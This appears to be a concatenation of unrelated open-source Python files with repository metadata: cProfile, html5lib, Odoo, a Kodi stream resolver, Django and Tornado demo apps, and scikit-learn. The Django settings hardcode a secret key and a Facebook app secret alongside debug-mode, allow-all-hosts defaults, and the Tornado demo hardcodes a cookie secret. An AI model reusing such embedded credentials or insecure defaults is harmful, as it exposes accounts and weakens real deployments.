if __name__ == "__main__":
unittest.main()
|
bsd-3-clause
|
invisiblek/python-for-android
|
python3-alpha/python3-src/Lib/cProfile.py
|
79
|
6350
|
#! /usr/bin/env python3
"""Python interface for the 'lsprof' profiler.
Compatible with the 'profile' module.
"""
__all__ = ["run", "runctx", "Profile"]
import _lsprof
# ____________________________________________________________
# Simple interface
def run(statement, filename=None, sort=-1):
"""Run statement under profiler optionally saving results in filename
This function takes a single argument that can be passed to the
"exec" statement, and an optional file name. In all cases this
routine attempts to "exec" its first argument and gather profiling
statistics from the execution. If no file name is present, then this
function automatically prints a simple profiling report, sorted by the
standard name string (file/line/function-name) that is presented in
each line.
"""
prof = Profile()
result = None
try:
try:
prof = prof.run(statement)
except SystemExit:
pass
finally:
if filename is not None:
prof.dump_stats(filename)
else:
result = prof.print_stats(sort)
return result
def runctx(statement, globals, locals, filename=None, sort=-1):
"""Run statement under profiler, supplying your own globals and locals,
optionally saving results in filename.
statement and filename have the same semantics as profile.run
"""
prof = Profile()
result = None
try:
try:
prof = prof.runctx(statement, globals, locals)
except SystemExit:
pass
finally:
if filename is not None:
prof.dump_stats(filename)
else:
result = prof.print_stats(sort)
return result
# ____________________________________________________________
class Profile(_lsprof.Profiler):
"""Profile(custom_timer=None, time_unit=None, subcalls=True, builtins=True)
Builds a profiler object using the specified timer function.
The default timer is a fast built-in one based on real time.
For custom timer functions returning integers, time_unit can
be a float specifying a scale (i.e. how long each integer unit
is, in seconds).
"""
# Most of the functionality is in the base class.
# This subclass only adds convenient and backward-compatible methods.
def print_stats(self, sort=-1):
import pstats
pstats.Stats(self).strip_dirs().sort_stats(sort).print_stats()
def dump_stats(self, file):
import marshal
f = open(file, 'wb')
self.create_stats()
marshal.dump(self.stats, f)
f.close()
def create_stats(self):
self.disable()
self.snapshot_stats()
def snapshot_stats(self):
entries = self.getstats()
self.stats = {}
callersdicts = {}
# call information
for entry in entries:
func = label(entry.code)
nc = entry.callcount # ncalls column of pstats (before '/')
cc = nc - entry.reccallcount # ncalls column of pstats (after '/')
tt = entry.inlinetime # tottime column of pstats
ct = entry.totaltime # cumtime column of pstats
callers = {}
callersdicts[id(entry.code)] = callers
self.stats[func] = cc, nc, tt, ct, callers
# subcall information
for entry in entries:
if entry.calls:
func = label(entry.code)
for subentry in entry.calls:
try:
callers = callersdicts[id(subentry.code)]
except KeyError:
continue
nc = subentry.callcount
cc = nc - subentry.reccallcount
tt = subentry.inlinetime
ct = subentry.totaltime
if func in callers:
prev = callers[func]
nc += prev[0]
cc += prev[1]
tt += prev[2]
ct += prev[3]
callers[func] = nc, cc, tt, ct
# The following two methods can be called by clients to use
# a profiler to profile a statement, given as a string.
def run(self, cmd):
import __main__
dict = __main__.__dict__
return self.runctx(cmd, dict, dict)
def runctx(self, cmd, globals, locals):
self.enable()
try:
exec(cmd, globals, locals)
finally:
self.disable()
return self
# This method is more useful to profile a single function call.
def runcall(self, func, *args, **kw):
self.enable()
try:
return func(*args, **kw)
finally:
self.disable()
# ____________________________________________________________
def label(code):
if isinstance(code, str):
return ('~', 0, code) # built-in functions ('~' sorts at the end)
else:
return (code.co_filename, code.co_firstlineno, code.co_name)
# ____________________________________________________________
def main():
import os, sys
from optparse import OptionParser
usage = "cProfile.py [-o output_file_path] [-s sort] scriptfile [arg] ..."
parser = OptionParser(usage=usage)
parser.allow_interspersed_args = False
parser.add_option('-o', '--outfile', dest="outfile",
help="Save stats to <outfile>", default=None)
parser.add_option('-s', '--sort', dest="sort",
help="Sort order when printing to stdout, based on pstats.Stats class",
default=-1)
if not sys.argv[1:]:
parser.print_usage()
sys.exit(2)
(options, args) = parser.parse_args()
sys.argv[:] = args
if len(args) > 0:
progname = args[0]
sys.path.insert(0, os.path.dirname(progname))
with open(progname, 'rb') as fp:
code = compile(fp.read(), progname, 'exec')
globs = {
'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None,
}
runctx(code, globs, None, options.outfile, options.sort)
else:
parser.print_usage()
return parser
# When invoked as main program, invoke the profiler on a script
if __name__ == '__main__':
main()
|
apache-2.0
|
TOCyna/tabelinha
|
flask/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
|
1730
|
3405
|
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to do
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
|
gpl-2.0
|
ovnicraft/odoo
|
addons/crm/res_partner.py
|
159
|
5149
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class res_partner(osv.osv):
""" Inherits partner and adds CRM information in the partner form """
_inherit = 'res.partner'
def _opportunity_meeting_phonecall_count(self, cr, uid, ids, field_name, arg, context=None):
res = dict(map(lambda x: (x,{'opportunity_count': 0, 'meeting_count': 0}), ids))
# the user may not have access rights for opportunities or meetings
try:
for partner in self.browse(cr, uid, ids, context):
if partner.is_company:
operator = 'child_of'
else:
operator = '='
opp_ids = self.pool['crm.lead'].search(cr, uid, [('partner_id', operator, partner.id), ('type', '=', 'opportunity'), ('probability', '<', '100')], context=context)
res[partner.id] = {
'opportunity_count': len(opp_ids),
'meeting_count': len(partner.meeting_ids),
}
except:
pass
return res
def _phonecall_count(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for partner in self.browse(cr, uid, ids, context):
res[partner.id] = len(partner.phonecall_ids)
return res
_columns = {
'section_id': fields.many2one('crm.case.section', 'Sales Team'),
'opportunity_ids': fields.one2many('crm.lead', 'partner_id',\
'Leads and Opportunities', domain=[('probability', 'not in', ['0', '100'])]),
'meeting_ids': fields.many2many('calendar.event', 'calendar_event_res_partner_rel','res_partner_id', 'calendar_event_id',
'Meetings'),
'phonecall_ids': fields.one2many('crm.phonecall', 'partner_id',\
'Phonecalls'),
'opportunity_count': fields.function(_opportunity_meeting_phonecall_count, string="Opportunity", type='integer', multi='opp_meet'),
'meeting_count': fields.function(_opportunity_meeting_phonecall_count, string="# Meetings", type='integer', multi='opp_meet'),
'phonecall_count': fields.function(_phonecall_count, string="Phonecalls", type="integer"),
}
def redirect_partner_form(self, cr, uid, partner_id, context=None):
search_view = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'view_res_partner_filter')
value = {
'domain': "[]",
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'res.partner',
'res_id': int(partner_id),
'view_id': False,
'context': context,
'type': 'ir.actions.act_window',
'search_view_id': search_view and search_view[1] or False
}
return value
def make_opportunity(self, cr, uid, ids, opportunity_summary, planned_revenue=0.0, probability=0.0, partner_id=None, context=None):
categ_obj = self.pool.get('crm.case.categ')
categ_ids = categ_obj.search(cr, uid, [('object_id.model','=','crm.lead')])
lead_obj = self.pool.get('crm.lead')
opportunity_ids = {}
for partner in self.browse(cr, uid, ids, context=context):
if not partner_id:
partner_id = partner.id
opportunity_id = lead_obj.create(cr, uid, {
'name' : opportunity_summary,
'planned_revenue' : planned_revenue,
'probability' : probability,
'partner_id' : partner_id,
'categ_ids' : categ_ids and categ_ids[0:1] or [],
'type': 'opportunity'
}, context=context)
opportunity_ids[partner_id] = opportunity_id
return opportunity_ids
def schedule_meeting(self, cr, uid, ids, context=None):
partner_ids = list(ids)
partner_ids.append(self.pool.get('res.users').browse(cr, uid, uid).partner_id.id)
res = self.pool.get('ir.actions.act_window').for_xml_id(cr, uid, 'calendar', 'action_calendar_event', context)
res['context'] = {
'search_default_partner_ids': list(ids),
'default_partner_ids': partner_ids,
}
return res
|
agpl-3.0
|
Sup3Roque/Pancas
|
_OLD/plugin.video.pancas/resources/lib/resolvers/hdcast.py
|
23
|
1601
|
# -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse
from resources.lib.libraries import client
def resolve(url):
try:
id = urlparse.parse_qs(urlparse.urlparse(url).query)['id'][0]
pageUrl = 'http://hdcast.me/embedplayer.php?id=%s&autoplay=true' % id
swfUrl = 'http://p.jwpcdn.com/6/12/jwplayer.flash.swf'
result = client.request(pageUrl, referer=pageUrl)
streamer = result.replace('//file', '')
streamer = re.compile("file *: *'(.+?)'").findall(streamer)[-1]
token = re.compile('getJSON[(]"(.+?)".+?json[.]token').findall(result.replace('\n', ''))[-1]
token = client.request(token, referer=pageUrl)
token = re.compile('"token" *: *"(.+?)"').findall(token)[-1]
url = '%s pageUrl=%s swfUrl=%s token=%s live=true timeout=20' % (streamer, pageUrl, swfUrl, token)
return url
except:
return
|
gpl-2.0
|
Lh4cKg/django-facebook
|
example/django_facebook/settings.py
|
1
|
3945
|
"""
Django settings for django_facebook project.
Generated by 'django-admin startproject' using Django 1.8.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'n8f#9mr4c0lia#db7em-g4u@-_k#9r^3y8__vf0=b-97kx2n++'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'facebook',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'django_facebook.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_facebook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'ka'
TIME_ZONE = 'Asia/Tbilisi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SITE_ID = 1
SITE_URL = ''
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
STATIC_URL = '/static/'
STATIC_ROOT = 'staticfiles'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
#'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# date formats
INPUT_DATE_FORMATS = [
'%m/%d/%Y',
]
# Facebook configuration
FACEBOOK_APP_ID = "1666839843562440"
FACEBOOK_APP_SECRET = "473d6b56341532388fa45f27b89b6a16"
FACEBOOK_URL = "http://www.facebook.com/"
AUTHORIZE_URL = "https://graph.facebook.com/oauth/authorize"
ACCESS_TOKEN_URL = "https://graph.facebook.com/oauth/access_token"
API_URL = "https://graph.facebook.com/v2.5/"
REQUEST_PERMISSIONS_URL = "https://www.facebook.com/dialog/oauth?"
GRAPH_ME_URL = "https://graph.facebook.com/v2.5/me"
FACEBOOK_SCOPE = ["email","user_birthday"] # publish_stream
CALLBACK_URL = "http://localhost:8000/callback/"
# Auth backends
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'facebook.backend.FacebookBackend',
)
|
mit
|
ddico/odoo
|
addons/hr/tests/test_hr_flow.py
|
6
|
2396
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.addons.hr.tests.common import TestHrCommon
class TestHrFlow(TestHrCommon):
def setUp(self):
super(TestHrFlow, self).setUp()
self.dep_rd = self.env['hr.department'].create({
'name': 'Research & Development',
})
self.job_developer = self.env['hr.job'].create({
'name': 'Experienced Developer',
'department_id': self.dep_rd.id,
'no_of_recruitment': 5,
})
self.employee_niv = self.env['hr.employee'].create({
'name': 'Sharlene Rhodes',
})
self.job_developer = self.job_developer.with_user(self.res_users_hr_officer.id)
self.employee_niv = self.employee_niv.with_user(self.res_users_hr_officer.id)
def test_open2recruit2close_job(self):
""" Opening the job position for "Developer" and checking the job status and recruitment count. """
self.job_developer.set_open()
self.assertEqual(self.job_developer.state, 'open', "Job position of 'Job Developer' is in 'open' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 0,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 0)."
% self.job_developer.no_of_recruitment)
""" Recruiting employee "NIV" for the job position "Developer" and checking the job status and recruitment count. """
self.job_developer.set_recruit()
self.assertEqual(self.job_developer.state, 'recruit', "Job position of 'Job Developer' is in 'recruit' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 1,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 1.0)."
% self.job_developer.no_of_recruitment)
self.employee_niv.write({'job_id': self.job_developer.id})
""" Closing the recruitment for the job position "Developer" by marking it as open. """
self.job_developer.set_open()
self.assertEqual(self.job_developer.state, 'open', "Job position of 'Job Developer' is in 'open' state.")
self.assertEqual(self.job_developer.no_of_recruitment, 0,
"Wrong number of recruitment for the job 'Job Developer'(%s found instead of 0)."
% self.job_developer.no_of_recruitment)
|
agpl-3.0
|
szeged/servo
|
tests/wpt/web-platform-tests/css/vendor-imports/mozilla/mozilla-central-reftests/text-decor-3/support/generate-text-emphasis-line-height-tests.py
|
829
|
3431
|
#!/usr/bin/env python
# - * - coding: UTF-8 - * -
"""
This script generates tests text-emphasis-line-height-001 ~ 004 except
001z. They test the line height expansion in different directions. This
script outputs a list of all tests it generated in the format of Mozilla
reftest.list to the stdout.
"""
from __future__ import unicode_literals
TEST_FILE = 'text-emphasis-line-height-{:03}{}.html'
TEST_TEMPLATE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Test: text-emphasis line height, {pos}, {wm}, {tag}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="help" href="https://drafts.csswg.org/css-text-decor-3/#text-emphasis-position-property">
<meta name="assert" content="text emphasis marks should expand the line height like ruby if necessary">
<link rel="match" href="text-emphasis-line-height-{index:03}-ref.html">
<p>Pass if the emphasis marks are {dir} the black line:</p>
{start}試験テスト{end}
'''
REF_FILE = 'text-emphasis-line-height-{:03}-ref.html'
REF_TEMPLATE='''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reference: text-emphasis line height, {pos}</title>
<link rel="author" title="Xidorn Quan" href="https://www.upsuper.org">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<style> rt {{ font-variant-east-asian: inherit; }} </style>
<p>Pass if the emphasis marks are {dir} the black line:</p>
<div style="line-height: 1; border-{pos}: 1px solid black; writing-mode: {wm}; ruby-position: {posval}"><ruby>試<rt>●</rt>験<rt>●</rt>テ<rt>●</rt>ス<rt>●</rt>ト<rt>●</rt></ruby></div>
'''
STYLE1 = 'line-height: 1; border-{pos}: 1px solid black; ' + \
'writing-mode: {wm}; text-emphasis-position: {posval};'
STYLE2 = 'text-emphasis: circle;'
TAGS = [
# (tag, start, end)
('div', '<div style="{style1}{style2}">', '</div>'),
('span', '<div style="{style1}"><span style="{style2}">', '</span></div>'),
]
POSITIONS = [
# pos, text-emphasis-position, ruby-position,
# writing-modes, dir text
('top', 'over right', 'over',
['horizontal-tb'], 'below'),
('bottom', 'under right', 'under',
['horizontal-tb'], 'over'),
('right', 'over right', 'over',
['vertical-rl', 'vertical-lr'], 'to the left of'),
('left', 'over left', 'under',
['vertical-rl', 'vertical-lr'], 'to the right of'),
]
import string
def write_file(filename, content):
with open(filename, 'wb') as f:
f.write(content.encode('UTF-8'))
print("# START tests from {}".format(__file__))
idx = 0
for (pos, emphasis_pos, ruby_pos, wms, dir) in POSITIONS:
idx += 1
ref_file = REF_FILE.format(idx)
content = REF_TEMPLATE.format(pos=pos, dir=dir, wm=wms[0], posval=ruby_pos)
write_file(ref_file, content)
suffix = iter(string.ascii_lowercase)
for wm in wms:
style1 = STYLE1.format(pos=pos, wm=wm, posval=emphasis_pos)
for (tag, start, end) in TAGS:
test_file = TEST_FILE.format(idx, next(suffix))
content = TEST_TEMPLATE.format(
pos=pos, wm=wm, tag=tag, index=idx, dir=dir,
start=start.format(style1=style1, style2=STYLE2), end=end)
write_file(test_file, content)
print("== {} {}".format(test_file, ref_file))
print("# END tests from {}".format(__file__))
|
mpl-2.0
|
zhangtianyi1234/django-haystack
|
haystack/inputs.py
|
12
|
4603
|
from __future__ import unicode_literals
import re
import warnings
from django.utils.encoding import python_2_unicode_compatible
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
@python_2_unicode_compatible
class BaseInput(object):
"""
The base input type. Doesn't do much. You want ``Raw`` instead.
"""
input_type_name = 'base'
post_process = True
def __init__(self, query_string, **kwargs):
self.query_string = query_string
self.kwargs = kwargs
def __repr__(self):
return u"<%s '%s'>" % (self.__class__.__name__, self.__unicode__().encode('utf8'))
def __str__(self):
return force_text(self.query_string)
def prepare(self, query_obj):
return self.query_string
class Raw(BaseInput):
"""
An input type for passing a query directly to the backend.
Prone to not being very portable.
"""
input_type_name = 'raw'
post_process = False
class PythonData(BaseInput):
"""
Represents a bare Python non-string type.
Largely only for internal use.
"""
input_type_name = 'python_data'
class Clean(BaseInput):
"""
An input type for sanitizing user/untrusted input.
"""
input_type_name = 'clean'
def prepare(self, query_obj):
query_string = super(Clean, self).prepare(query_obj)
return query_obj.clean(query_string)
class Exact(BaseInput):
"""
An input type for making exact matches.
"""
input_type_name = 'exact'
def prepare(self, query_obj):
query_string = super(Exact, self).prepare(query_obj)
if self.kwargs.get('clean', False):
# We need to clean each part of the exact match.
exact_bits = [Clean(bit).prepare(query_obj) for bit in query_string.split(' ') if bit]
query_string = u' '.join(exact_bits)
return query_obj.build_exact_query(query_string)
class Not(Clean):
"""
An input type for negating a query.
"""
input_type_name = 'not'
def prepare(self, query_obj):
query_string = super(Not, self).prepare(query_obj)
return query_obj.build_not_query(query_string)
class AutoQuery(BaseInput):
"""
A convenience class that handles common user queries.
In addition to cleaning all tokens, it handles double quote bits as
exact matches & terms with '-' in front as NOT queries.
"""
input_type_name = 'auto_query'
post_process = False
exact_match_re = re.compile(r'"(?P<phrase>.*?)"')
def prepare(self, query_obj):
query_string = super(AutoQuery, self).prepare(query_obj)
exacts = self.exact_match_re.findall(query_string)
tokens = []
query_bits = []
for rough_token in self.exact_match_re.split(query_string):
if not rough_token:
continue
elif not rough_token in exacts:
# We have something that's not an exact match but may have more
# than on word in it.
tokens.extend(rough_token.split(' '))
else:
tokens.append(rough_token)
for token in tokens:
if not token:
continue
if token in exacts:
query_bits.append(Exact(token, clean=True).prepare(query_obj))
elif token.startswith('-') and len(token) > 1:
# This might break Xapian. Check on this.
query_bits.append(Not(token[1:]).prepare(query_obj))
else:
query_bits.append(Clean(token).prepare(query_obj))
return u' '.join(query_bits)
class AltParser(BaseInput):
"""
If the engine supports it, this input type allows for submitting a query
that uses a different parser.
"""
input_type_name = 'alt_parser'
post_process = False
use_parens = False
def __init__(self, parser_name, query_string='', **kwargs):
self.parser_name = parser_name
self.query_string = query_string
self.kwargs = kwargs
def __repr__(self):
return u"<%s '%s' '%s' '%s'>" % (self.__class__.__name__, self.parser_name, self.query_string, self.kwargs)
def prepare(self, query_obj):
if not hasattr(query_obj, 'build_alt_parser_query'):
warnings.warn("Use of 'AltParser' input type is being ignored, as the '%s' backend doesn't support them." % query_obj)
return ''
return query_obj.build_alt_parser_query(self.parser_name, self.query_string, **self.kwargs)
|
bsd-3-clause
|
cloudkick/cast-site
|
hyde/lib/tornado/demos/blog/blog.py
|
5
|
6902
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import markdown
import os.path
import re
import tornado.auth
import tornado.database
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import unicodedata
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
define("mysql_host", default="127.0.0.1:3306", help="blog database host")
define("mysql_database", default="blog", help="blog database name")
define("mysql_user", default="blog", help="blog database user")
define("mysql_password", default="blog", help="blog database password")
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", HomeHandler),
(r"/archive", ArchiveHandler),
(r"/feed", FeedHandler),
(r"/entry/([^/]+)", EntryHandler),
(r"/compose", ComposeHandler),
(r"/auth/login", AuthLoginHandler),
(r"/auth/logout", AuthLogoutHandler),
]
settings = dict(
blog_title=u"Tornado Blog",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
ui_modules={"Entry": EntryModule},
xsrf_cookies=True,
cookie_secret="11oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=",
login_url="/auth/login",
)
tornado.web.Application.__init__(self, handlers, **settings)
# Have one global connection to the blog DB across all handlers
self.db = tornado.database.Connection(
host=options.mysql_host, database=options.mysql_database,
user=options.mysql_user, password=options.mysql_password)
class BaseHandler(tornado.web.RequestHandler):
@property
def db(self):
return self.application.db
def get_current_user(self):
user_id = self.get_secure_cookie("user")
if not user_id: return None
return self.db.get("SELECT * FROM authors WHERE id = %s", int(user_id))
class HomeHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC LIMIT 5")
if not entries:
self.redirect("/compose")
return
self.render("home.html", entries=entries)
class EntryHandler(BaseHandler):
def get(self, slug):
entry = self.db.get("SELECT * FROM entries WHERE slug = %s", slug)
if not entry: raise tornado.web.HTTPError(404)
self.render("entry.html", entry=entry)
class ArchiveHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC")
self.render("archive.html", entries=entries)
class FeedHandler(BaseHandler):
def get(self):
entries = self.db.query("SELECT * FROM entries ORDER BY published "
"DESC LIMIT 10")
self.set_header("Content-Type", "application/atom+xml")
self.render("feed.xml", entries=entries)
class ComposeHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
id = self.get_argument("id", None)
entry = None
if id:
entry = self.db.get("SELECT * FROM entries WHERE id = %s", int(id))
self.render("compose.html", entry=entry)
@tornado.web.authenticated
def post(self):
id = self.get_argument("id", None)
title = self.get_argument("title")
text = self.get_argument("markdown")
html = markdown.markdown(text)
if id:
entry = self.db.get("SELECT * FROM entries WHERE id = %s", int(id))
if not entry: raise tornado.web.HTTPError(404)
slug = entry.slug
self.db.execute(
"UPDATE entries SET title = %s, markdown = %s, html = %s "
"WHERE id = %s", title, text, html, int(id))
else:
slug = unicodedata.normalize("NFKD", title).encode(
"ascii", "ignore")
slug = re.sub(r"[^\w]+", " ", slug)
slug = "-".join(slug.lower().strip().split())
if not slug: slug = "entry"
while True:
e = self.db.get("SELECT * FROM entries WHERE slug = %s", slug)
if not e: break
slug += "-2"
self.db.execute(
"INSERT INTO entries (author_id,title,slug,markdown,html,"
"published) VALUES (%s,%s,%s,%s,%s,UTC_TIMESTAMP())",
self.current_user.id, title, slug, text, html)
self.redirect("/entry/" + slug)
class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
@tornado.web.asynchronous
def get(self):
if self.get_argument("openid.mode", None):
self.get_authenticated_user(self.async_callback(self._on_auth))
return
self.authenticate_redirect()
def _on_auth(self, user):
if not user:
raise tornado.web.HTTPError(500, "Google auth failed")
author = self.db.get("SELECT * FROM authors WHERE email = %s",
user["email"])
if not author:
# Auto-create first author
any_author = self.db.get("SELECT * FROM authors LIMIT 1")
if not any_author:
author_id = self.db.execute(
"INSERT INTO authors (email,name) VALUES (%s,%s)",
user["email"], user["name"])
else:
self.redirect("/")
return
else:
author_id = author["id"]
self.set_secure_cookie("user", str(author_id))
self.redirect(self.get_argument("next", "/"))
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.redirect(self.get_argument("next", "/"))
class EntryModule(tornado.web.UIModule):
def render(self, entry):
return self.render_string("modules/entry.html", entry=entry)
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
apache-2.0
|
VanirAOSP/external_chromium_org
|
chrome/common/extensions/docs/server2/docs_server_utils.py
|
27
|
1296
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from base64 import b64encode
from hashlib import sha1
import os
def FormatKey(key):
'''Normalize a key by making sure it has a .html extension, and convert any
'.'s to '_'s.
'''
if key.endswith('.html'):
key = key[:-len('.html')]
safe_key = key.replace('.', '_')
return '%s.html' % safe_key
def SanitizeAPIName(name):
'''Sanitizes API filenames that are in subdirectories.
'''
filename = os.path.splitext(name)[0].replace(os.sep, '_')
if 'experimental' in filename:
filename = 'experimental_' + filename.replace('experimental_', '')
return filename
def StringIdentity(string):
'''Creates a small hash of a string.
'''
return b64encode(sha1(string).digest())[:8]
def MarkLast(dicts):
'''Adds a property 'last' == True to the last element in a list of dicts.
'''
if len(dicts) > 0:
dicts[-1]['last'] = True
def ToUnicode(data):
'''Returns the str |data| as a unicode object. It's expected to be utf8, but
there are also latin-1 encodings in there for some reason. Fall back to that.
'''
try:
return unicode(data, 'utf-8')
except:
return unicode(data, 'latin-1')
|
bsd-3-clause
|
dingocuster/scikit-learn
|
sklearn/decomposition/fastica_.py
|
199
|
18122
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Authors: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
